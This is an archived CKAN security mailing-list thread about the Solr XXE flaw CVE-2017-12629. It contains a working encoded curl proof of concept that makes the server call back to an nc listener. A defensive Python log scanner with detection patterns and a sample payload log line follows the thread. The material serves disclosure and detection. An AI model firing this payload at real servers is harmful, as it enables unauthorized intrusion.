[CKAN-Security] solr 6.2

David Read david.read at hackneyworkshop.com
Thu Feb 22 13:20:02 UTC 2018


Good suggestion to upgrade solr.

By the way, I have a quick patch for CKAN I have prepared this morning that
I can put forward tomorrow (to CKAN security team only).
D

On Thu, 22 Feb 2018 at 09:28, Adrià Mercader <adria.mercader at okfn.org>
wrote:

> Apologies, I misread the available versions and in fact the upgrade is
> from 6.2 to 6.6.2.
>
> In any case and given the use CKAN makes of Solr I don't see any potential
> issues with the upgrade after going through the changes list:
>
>
> https://lucene.apache.org/solr/guide/6_6/upgrading-solr.html#UpgradingSolr-Upgradingfromearlier6.xversions
>
>
> Hope this helps,
>
> Adrià
>
>
> On 22 February 2018 at 09:55, Adrià Mercader <adria.mercader at okfn.org>
> wrote:
>
>> Hi JD,
>>
>> Many thanks for the report. We have received reports of this issue and
>> are preparing patches and/or updates to help mitigate it. If you are using
>> the Docker image included in contrib the easiest fix is just to use the
>> solr:6.2.2 image as this one includes the fix for the issue:
>>
>>
>> https://lucene.apache.org/solr/news.html#18-october-2017-apache-solrtm-662-available
>>
>> It only includes this bug fix so it should not cause any compatibility
>> issues.
>>
>> We will update the image in contrib asap, and let you know of any
>> mitigation steps that we take.
>>
>> Best regards,
>>
>> Adrià
>>
>> On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:
>>
>>> Hi
>>>
>>> We've contracted someone to pen-test data.vulekamali.gov.za who found
>>> the following critical vulnerability in CKAN 6.2 as used in the Dockerfile
>>> under contrib:
>>>
>>> https://www.cvedetails.com/cve/CVE-2017-12629/
>>> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>>>
>>> We're launching our portal right now so we're not comfortable upgrading solr
>>> just yet, but remapping the xmlparser name to the edismax class has
>>> mitigated it for us for now. See
>>> https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list
>>>
>>> I confirmed the vulnerability with the following curl request against a
>>> locally-running ckan instance:
>>> curl -v "localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D"
>>>
>>> On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when
>>> running the request against ckan, I saw a GET request in nc. You can also
>>> verify the vulnerability by looking for "Connection Refused" in the error
>>> response which shows the server tried to request the DOCTYPE you told it
>>> to, and would have executed malicious code you would have served.
>>>
>>> Best
>>> JD
>>>
>>> _______________________________________________
>>> CKAN security
>>> https://lists.okfn.org/mailman/listinfo/security
>>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>>>
>>> Repo: https://github.com/ckan/ckan-security
>>>
>>
>>
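The report above describes how the CVE-2017-12629 request reached Solr through CKAN's search API: a `q` parameter carrying `{!xmlparser ...}` local params with an inline DOCTYPE. As an added example that is not part of the thread, the following script shows how a defender can check web-server access logs for that pattern while a patch or the edismax remap is being rolled out. It assumes Combined Log Format lines and uses constructed sample entries; the callback host in them is a placeholder.

```python
"""Flag requests whose Solr query uses the xmlparser local-params syntax."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a Combined Log Format record (format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Local params selecting the XML query parser, e.g. {!xmlparser v='...'}.
LOCAL_PARAM_RE = re.compile(r'^\s*\{!\s*xmlparser\b', re.IGNORECASE)
# Inline DOCTYPE with a SYSTEM identifier, the external-entity trigger in the report.
DOCTYPE_RE = re.compile(r'<!DOCTYPE[^>]*\bSYSTEM\b', re.IGNORECASE)


def classify_request(target):
    """Return sorted reasons a request target looks like xmlparser abuse ([] if clean)."""
    reasons = set()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for values in params.values():
        for value in values:
            decoded = unquote(value)  # second decode catches double-encoded payloads
            if LOCAL_PARAM_RE.search(decoded):
                reasons.add("xmlparser local params in query")
            if DOCTYPE_RE.search(decoded):
                reasons.add("inline DOCTYPE with SYSTEM identifier")
    return sorted(reasons)


def scan_log(lines):
    """Return (line_number, request_target, reasons) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = classify_request(match.group("target"))
            if reasons:
                hits.append((number, match.group("target"), reasons))
    return hits


# Constructed sample log lines (not real traffic). The second reuses the encoded
# query shape from the report with a placeholder callback host; the third shows
# that the word "xmlparser" alone is not enough to trigger a hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Feb/2018:09:10:11 +0000] "GET /api/3/action/package_search?q=budget HTTP/1.1" 200 512',
    '10.0.0.9 - - [22/Feb/2018:09:10:12 +0000] "GET /api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2Fcallback.example%2Fx%22%3E%3Ca%3E%3C%2Fa%3E%27%7D HTTP/1.1" 500 87',
    '10.0.0.9 - - [22/Feb/2018:09:10:13 +0000] "GET /dataset?q=xmlparser%20docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```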

